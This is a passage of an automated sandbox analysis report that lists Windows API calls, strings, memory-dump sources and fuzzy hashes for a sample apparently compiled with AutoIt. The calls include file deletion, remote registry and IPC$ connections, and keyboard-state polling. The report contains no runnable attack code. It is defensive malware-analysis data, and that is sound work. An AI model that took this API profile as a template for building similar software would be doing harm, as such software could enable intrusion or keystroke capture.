• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 39ce04ecd6d790856b0f8b38f25fb26e03031ef07a849b2d673abb29cb7c2c9d
• Instruction ID: b87404f8ad76d4b4eae4f69bc4502e75d3a2f363a3c940ec984bf791f1ba81eb
• Opcode Fuzzy Hash: 39ce04ecd6d790856b0f8b38f25fb26e03031ef07a849b2d673abb29cb7c2c9d
• Instruction Fuzzy Hash: 0A513571A04209EFCB14DFA8CC89EAEBBB9FF49310F14841DF94AA7250D731A9459B60
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A4D4
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
• LoadStringW.USER32(?,?,00000FFF,?), ref: 0057A4F6
• __swprintf.LIBCMT ref: 0057A54F
• __swprintf.LIBCMT ref: 0057A568
• _wprintf.LIBCMT ref: 0057A61E
• _wprintf.LIBCMT ref: 0057A63C
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-2391861430
• Opcode ID: 88d8482a9a8548457062052b3ede77d265fd1ce87ac208340059714e8897410e
• Instruction ID: 66868ba61203498f7f78fddf196de9f18ddd11e7646f10b9515f4f61994ec0f0
• Opcode Fuzzy Hash: 88d8482a9a8548457062052b3ede77d265fd1ce87ac208340059714e8897410e
• Instruction Fuzzy Hash: 2051D47180051AAACF14EBE0ED4AEEEBF79BF65340F104165F505B2091EB312F48DB95
APIs
  • Part of subcall function 0057951A: __time64.LIBCMT ref: 00579524
  • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
• __wsplitpath.LIBCMT ref: 005797EF
  • Part of subcall function 0053431E: __wsplitpath_helper.LIBCMT ref: 0053435E
• _wcscpy.LIBCMT ref: 00579802
                                                                                                                                        • _wcscat.LIBCMT ref: 00579815
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0057983A
                                                                                                                                        • _wcscat.LIBCMT ref: 00579850
                                                                                                                                        • _wcscat.LIBCMT ref: 00579863
                                                                                                                                          • Part of subcall function 00579560: _memmove.LIBCMT ref: 00579599
                                                                                                                                          • Part of subcall function 00579560: _memmove.LIBCMT ref: 005795A8
                                                                                                                                        • _wcscmp.LIBCMT ref: 005797AA
                                                                                                                                          • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DE1
                                                                                                                                          • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DF4
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00579A0D
                                                                                                                                        • _wcsncpy.LIBCMT ref: 00579A80
                                                                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 00579AB6
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00579ACC
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579ADD
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579AEF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1500180987-0
                                                                                                                                        • Opcode ID: a2fabebeb181b1c733d910dd534abf9c426045802056415525754b7f983fad7e
                                                                                                                                        • Instruction ID: f0a9612d1a8cfffc2dbef772bee37ef73c7c9b4c7d54134f0579c1a31687e88b
                                                                                                                                        • Opcode Fuzzy Hash: a2fabebeb181b1c733d910dd534abf9c426045802056415525754b7f983fad7e
                                                                                                                                        • Instruction Fuzzy Hash: F5C140B1900129AADF11DF95DC85EDEBBBDFF95300F0080AAF609E7151EB309A849F65
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00525BF1
                                                                                                                                        • GetMenuItemCount.USER32(005D7890), ref: 00560E7B
                                                                                                                                        • GetMenuItemCount.USER32(005D7890), ref: 00560F2B
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00560F6F
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00560F78
                                                                                                                                        • TrackPopupMenuEx.USER32(005D7890,00000000,?,00000000,00000000,00000000), ref: 00560F8B
                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00560F97
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2751501086-0
                                                                                                                                        • Opcode ID: 90f7e36580e382112b6e8ea2533d32756da65e893ff71b615608eab388807db8
                                                                                                                                        • Instruction ID: 45e6d2bc2720fc96e7a8471ebb4b1056e213b3ccb104c5d8f783bd797a2a9898
                                                                                                                                        • Opcode Fuzzy Hash: 90f7e36580e382112b6e8ea2533d32756da65e893ff71b615608eab388807db8
                                                                                                                                        • Instruction Fuzzy Hash: D071F230644629BFEB208B54DC89FAABF68FF45364F144216F618AB1D0D7B16C60DB90
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?,005A0980), ref: 0057AF4E
                                                                                                                                        • GetDriveTypeW.KERNEL32(00000061,005CB5F0,00000061), ref: 0057B018
                                                                                                                                        • _wcscpy.LIBCMT ref: 0057B042
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                        • String ID: L,Z$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                        • API String ID: 2820617543-1733661187
                                                                                                                                        • Opcode ID: e23c8e7bddb0ad9ed63c754c71d4bf0ecc08472721576d5599489e4a566c428c
                                                                                                                                        • Instruction ID: 5475ae5a94a9db8f21b050dca7e0aff03d6014914fbdd508f50c21a308894475
                                                                                                                                        • Opcode Fuzzy Hash: e23c8e7bddb0ad9ed63c754c71d4bf0ecc08472721576d5599489e4a566c428c
                                                                                                                                        • Instruction Fuzzy Hash: AC51AA741083129FD314EF14E896AAFBFA5BFD1300F50881DF499572E2EB319D49DA82
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • _memset.LIBCMT ref: 00568489
                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005684BE
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005684DA
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005684F6
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00568520
                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00568548
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00568553
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00568558
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                                        • Opcode ID: 653fe473d5914861f525c93322e5b68271ae8d5364913297c2b6606d105b02fc
                                                                                                                                        • Instruction ID: 5db0adbb90dd84570dcd3673410f5d8cc822dffc47c52a0d3c632e349ea4021c
                                                                                                                                        • Opcode Fuzzy Hash: 653fe473d5914861f525c93322e5b68271ae8d5364913297c2b6606d105b02fc
                                                                                                                                        • Instruction Fuzzy Hash: 38410A76C1062EABCF11EBA4EC99DEEBB78FF65740F004529F905A3191DA305E04CB94
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                                        • Opcode ID: 98c851c29a16a792da2b98f3e6e51cb3da8370416f8c2d1f374f8826bb11868e
                                                                                                                                        • Instruction ID: 3955d4ddf4d6175dc7f9371381599c4e67406cb97afea53e40afb09f0afbf7ba
                                                                                                                                        • Opcode Fuzzy Hash: 98c851c29a16a792da2b98f3e6e51cb3da8370416f8c2d1f374f8826bb11868e
                                                                                                                                        • Instruction Fuzzy Hash: 44413A3050066B9BDF14EF90D955AEB3FA4BFA2300F524819FC5657292DB30ED19CB64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                          • Part of subcall function 0052153B: _memmove.LIBCMT ref: 005215C4
                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005758EB
                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00575901
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00575912
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00575924
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00575935
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$_memmove
                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 00575535
                                                                                                                                          • Part of subcall function 00530859: timeGetTime.WINMM(?,00000002,0051C22C), ref: 0053085D
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00575561
                                                                                                                                        • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00575585
                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005755A7
                                                                                                                                        • SetActiveWindow.USER32 ref: 005755C6
                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005755D4
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 005755F3
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 005755FE
                                                                                                                                        • IsWindow.USER32 ref: 0057560A
                                                                                                                                        • EndDialog.USER32(00000000), ref: 0057561B
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                        • String ID: BUTTON
                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0057DC2D
                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0057DCC0
                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0057DCD4
                                                                                                                                        • CoCreateInstance.OLE32(005A3D4C,00000000,00000001,005CB86C,?), ref: 0057DD20
                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0057DD8F
                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0057DDE7
                                                                                                                                        • _memset.LIBCMT ref: 0057DE24
                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0057DE60
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0057DE83
                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0057DE8A
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0057DEC1
                                                                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0057DEC3
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1246142700-0
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00570896
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00570901
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00570921
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00570938
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00570967
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00570978
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 005709A4
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 005709B2
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 005709DB
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 005709E9
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00570A12
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00570A20
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0056CE1C
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0056CE2E
                                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0056CE8C
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0056CE97
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0056CEA9
                                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0056CEFD
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0056CF0B
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0056CF1C
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0056CF5F
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0056CF6D
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0056CF8A
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0056CF97
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 005125AF
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 259745315-0
APIs
  • Part of subcall function 00530B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00522A3E,?,00008000), ref: 00530BA7
  • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
• SetCurrentDirectoryW.KERNEL32(?), ref: 00522C2C
  • Part of subcall function 00523EBE: _wcscpy.LIBCMT ref: 00523EF6
  • Part of subcall function 0053386D: _iswctype.LIBCMT ref: 00533875
Strings
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-3738523708
APIs
Strings
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
APIs
• _memset.LIBCMT ref: 0059778F
• CreateMenu.USER32 ref: 005977AA
• SetMenu.USER32(?,00000000), ref: 005977B9
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597846
• IsMenu.USER32(?), ref: 0059785C
• CreatePopupMenu.USER32 ref: 00597866
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00597893
• DrawMenuBar.USER32 ref: 0059789B
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00597B83
• CreateCompatibleDC.GDI32(00000000), ref: 00597B8A
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00597B9D
• SelectObject.GDI32(00000000,00000000), ref: 00597BA5
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00597BB0
• DeleteDC.GDI32(00000000), ref: 00597BB9
• GetWindowLongW.USER32(?,000000EC), ref: 00597BC3
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00597BD7
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00597BE3
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
APIs
• _memset.LIBCMT ref: 0053706B
  • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
• __gmtime64_s.LIBCMT ref: 00537104
• __gmtime64_s.LIBCMT ref: 0053713A
• __gmtime64_s.LIBCMT ref: 00537157
• __allrem.LIBCMT ref: 005371AD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005371C9
• __allrem.LIBCMT ref: 005371E0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005371FE
• __allrem.LIBCMT ref: 00537215
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00537233
• __invoke_watson.LIBCMT ref: 005372A4
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 00572CE9
• GetMenuItemInfoW.USER32(005D7890,000000FF,00000000,00000030), ref: 00572D4A
• SetMenuItemInfoW.USER32(005D7890,00000004,00000000,00000030), ref: 00572D80
• Sleep.KERNEL32(000001F4), ref: 00572D92
• GetMenuItemCount.USER32(?), ref: 00572DD6
• GetMenuItemID.USER32(?,00000000), ref: 00572DF2
• GetMenuItemID.USER32(?,-00000001), ref: 00572E1C
• GetMenuItemID.USER32(?,?), ref: 00572E61
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00572EA7
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572EBB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572EDC
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4176008265-0
                                                                                                                                        • Opcode ID: 266baeefa5de27a31546b0b0195705486690dc818dce8385ac9679b7ddc3ed33
                                                                                                                                        • Instruction ID: 6f4f39d39d0651cd256b4890b4b0bcfae5fa990f567f53bcd7e53ea6337f4af9
                                                                                                                                        • Opcode Fuzzy Hash: 266baeefa5de27a31546b0b0195705486690dc818dce8385ac9679b7ddc3ed33
                                                                                                                                        • Instruction Fuzzy Hash: 53616E70900249AFDB21CF64EC88ABE7FB9FB55314F14845AF845A7291D731AD0AFB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005975CA
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005975CD
• GetWindowLongW.USER32(?,000000F0), ref: 005975F1
• _memset.LIBCMT ref: 00597602
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00597614
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0059768C
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 092e8fb6ba8d03167214025b53ab657c2f548b1d2e41fd9ee5d41c147658200a
• Instruction ID: f76979a726c1d3e11f5195f58e77dc0c4a7bdc6ba1cd998ddb35a9d479baecee
• Opcode Fuzzy Hash: 092e8fb6ba8d03167214025b53ab657c2f548b1d2e41fd9ee5d41c147658200a
• Instruction Fuzzy Hash: D0615875904208AFDB20DFA8CC85EEE7BB8FB4D710F14019AFA14A72A1D770AD45DB60
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005677DD
• SafeArrayAllocData.OLEAUT32(?), ref: 00567836
• VariantInit.OLEAUT32(?), ref: 00567848
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00567868
• VariantCopy.OLEAUT32(?,?), ref: 005678BB
• SafeArrayUnaccessData.OLEAUT32(?), ref: 005678CF
• VariantClear.OLEAUT32(?), ref: 005678E4
• SafeArrayDestroyData.OLEAUT32(?), ref: 005678F1
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005678FA
• VariantClear.OLEAUT32(?), ref: 0056790C
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00567917
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
